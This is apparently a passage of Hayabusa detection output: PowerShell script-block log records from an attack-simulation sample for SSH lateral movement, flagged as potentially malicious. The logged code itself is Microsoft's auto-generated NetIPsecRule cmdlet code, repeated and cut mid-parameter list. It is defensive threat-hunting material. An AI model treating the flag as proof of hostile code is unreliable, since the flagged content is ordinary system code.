$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPh",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.081 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecRule' -Alias '*' function Remove-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 